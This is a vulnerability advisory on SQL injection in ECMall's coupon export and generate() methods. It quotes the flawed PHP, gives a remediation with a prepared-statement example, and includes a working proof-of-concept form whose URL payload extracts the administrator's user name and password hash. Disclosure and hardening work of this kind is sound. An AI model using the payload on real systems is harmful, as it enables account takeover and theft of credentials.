Vulnerability details

Disclosure status:

2013-12-31: Details reported to the vendor, awaiting the vendor's handling
2014-01-05: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-03-28: Details made public

Brief description:

New Year is almost here, any presents?

Detailed description:

The affected file is app/coupon.app.php:

function export()
{
    $coupon_id = isset($_GET['id']) ? trim($_GET['id']) : ''; // not filtered here at all
    if (empty($coupon_id))
    {
        echo Lang::get('no_coupon');
        exit;
    }
    if (!IS_POST)
    {
        header("Content-Type:text/html;charset=" . CHARSET);
        $this->assign('id', $coupon_id);
        $this->display('coupon_export.html');
    }
    else
    {
        $amount = intval(trim($_POST['amount']));
        if (empty($amount))
        {
            $this->pop_warning('involid_data');
            exit;
        }
        $info = $this->_coupon_mod->get_info($coupon_id);
        $coupon_name = ecm_iconv(CHARSET, 'gbk', $info['coupon_name']);
        header('Content-type: application/txt');
        header('Content-Disposition: attachment; filename="coupon_' . date('Ymd') . '_' . $coupon_name . '.txt"');
        $sn_array = $this->generate($amount, $coupon_id);
        $crlf = get_crlf();
        foreach ($sn_array as $val)
        {
            echo $val['coupon_sn'] . $crlf;
        }
    }
}

function extend()
{
    $coupon_id = isset($_GET['id']) ? trim($_GET['id']) : ''; // not filtered here either
    // (remainder of the method not shown in the advisory)
}



Looking further, both of these end up calling the following method:

function generate($num, $id)
{
    // $id is concatenated without quotes, so the injection happens here
    $use_times = $this->_coupon_mod->get(array('fields' => 'use_times', 'conditions' => 'store_id = ' . $this->_store_id . ' AND coupon_id = ' . $id));

    if ($num > 1000)
    {
        $num = 1000;
    }
    if ($num < 1)
    {
        $num = 1;
    }
    $times = $use_times['use_times'];
    $add_data = array();
    $str = '';
    $pix = 0;
    if (file_exists(ROOT_PATH . '/data/generate.txt'))
    {
        $s = file_get_contents(ROOT_PATH . '/data/generate.txt');
        $pix = intval($s);
    }
    $max = $pix + $num;
    file_put_contents(ROOT_PATH . '/data/generate.txt', $max);
    $couponsn = '';
    $tmp = '';
    $cpm = '';
    $str = '';
    for ($i = $pix + 1; $i <= $max; $i++)
    {
        $cpm = sprintf("%08d", $i);
        $tmp = mt_rand(1000, 9999);
        $couponsn = $cpm . $tmp;
        // $id is interpolated unquoted into the VALUES list as well
        $str .= "('{$couponsn}', {$id}, {$times}),";
        $add_data[] = array(
            'coupon_sn' => $couponsn,
            'coupon_id' => $id,
            'remain_times' => $times,
        );
    }
    $string = substr($str, 0, strrpos($str, ','));
    $this->_couponsn_mod->db->query("INSERT INTO {$this->_couponsn_mod->table} (coupon_sn, coupon_id, remain_times) VALUES {$string}", 'SILENT');
    return $add_data;
}

Proof of vulnerability:

1. First register a store, log in, and add a coupon.

[screenshot: 11.png]



2. Since this is a POST injection, for simplicity I used a web page to submit it.

<form action="http://192.168.1.74:8000/ecmall/index.php?app=coupon&act=export&id=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23" method="post">
<table width="960" border="1">
<tr>
<td width="302">&nbsp;</td>
<td width="642">&nbsp;</td>
</tr>
<tr>
<td><h3>导出数量:</h3></td>
<td><label>
<input name="amount" type="text" id="amount" value="1" />
</label></td>
</tr>
<tr>
<td><label>
<div align="right">
<input type="submit" name="Submit" value="提交" />
</div>
</label></td>
<td>&nbsp;</td>
</tr>
</table>
</form>



After saving this as a web page, open it in the logged-in IE session and submit; a download prompt appears.

[screenshot: 222.png]



After saving, open the file and you will find:

[screenshot: 333.png]



Fix recommendation:

Filter the id with intval.
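To make the fix concrete for both the id handling in export()/extend() and the unquoted concatenation in generate(), here is an added example (not ECMall's code) that applies the recommended intval coercion and replaces the string-built conditions and VALUES list with bound parameters. It runs stand-alone against an in-memory SQLite database; the table names ecm_coupon and ecm_coupon_sn, the store id 7 and the sample id string are constructed assumptions that only mirror the names visible in the advisory.

```php
<?php
// Added example, not ECMall's code: hardened counterpart of the vulnerable
// export()/extend()/generate() shown in the advisory. Uses in-memory SQLite
// so it runs stand-alone; table names and the store id are constructed.

/**
 * Coerce a raw id to a positive integer, as the advisory's "filter with
 * intval" fix recommends. Anything that is not a positive integer yields 0,
 * which callers treat as "no coupon".
 */
function sanitize_coupon_id($raw)
{
    $id = intval(trim((string)$raw));
    return $id > 0 ? $id : 0;
}

/**
 * Replacement for the "... AND coupon_id = " . $id condition string in
 * generate(): both values are bound, so the id cannot alter the statement.
 */
function get_use_times(PDO $db, $store_id, $coupon_id)
{
    $stmt = $db->prepare(
        'SELECT use_times FROM ecm_coupon WHERE store_id = :sid AND coupon_id = :cid'
    );
    $stmt->execute([':sid' => (int)$store_id, ':cid' => (int)$coupon_id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int)$row['use_times'];
}

/**
 * Generates $num serial numbers, keeping the original's 1..1000 clamp and
 * 8-digit-counter-plus-4-digit-suffix format, but inserting through a
 * prepared statement instead of an interpolated VALUES list.
 * $start stands in for the data/generate.txt counter of the original.
 */
function generate_coupon_sns(PDO $db, $num, $coupon_id, $times, $start = 0)
{
    $num = max(1, min(1000, (int)$num));
    $insert = $db->prepare(
        'INSERT INTO ecm_coupon_sn (coupon_sn, coupon_id, remain_times) VALUES (:sn, :cid, :times)'
    );
    $out = [];
    $db->beginTransaction();
    for ($i = $start + 1; $i <= $start + $num; $i++) {
        // random_int() is CSPRNG-backed; mt_rand(), used by the original, is not
        $sn = sprintf('%08d', $i) . random_int(1000, 9999);
        $insert->execute([':sn' => $sn, ':cid' => (int)$coupon_id, ':times' => (int)$times]);
        $out[] = $sn;
    }
    $db->commit();
    return $out;
}

// --- constructed fixture ---------------------------------------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ecm_coupon (coupon_id INTEGER, store_id INTEGER, use_times INTEGER)');
$db->exec('CREATE TABLE ecm_coupon_sn (coupon_sn TEXT, coupon_id INTEGER, remain_times INTEGER)');
$db->exec('INSERT INTO ecm_coupon VALUES (1, 7, 3)'); // coupon 1 of store 7, usable 3 times

// A constructed id in the shape the advisory abuses: a number with SQL appended.
$raw_id = '1 AND 1=1 #';
$coupon_id = sanitize_coupon_id($raw_id);
var_dump($coupon_id);                 // int(1): the trailing SQL is discarded
var_dump(sanitize_coupon_id('abc'));  // int(0): caller should answer no_coupon

$times = get_use_times($db, 7, $coupon_id);  // 3
$sns = generate_coupon_sns($db, 2, $coupon_id, $times);
print_r($sns);                        // two 12-digit serials such as 000000014821
```

The cast alone closes the injection shown on this page, but binding the parameters is the durable fix: it protects generate() even if a future caller passes the id through without the cast, and it removes the unquoted interpolation of $id into the VALUES list as well as into the WHERE clause.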

Copyright notice: when reposting, please credit the source: kelon@WooYun


Vulnerability response

Vendor response:

Severity: no impact (ignored by vendor)

Ignored at: 2014-01-05 10:47

Vendor reply:

Latest status:

None yet


Vulnerability rating: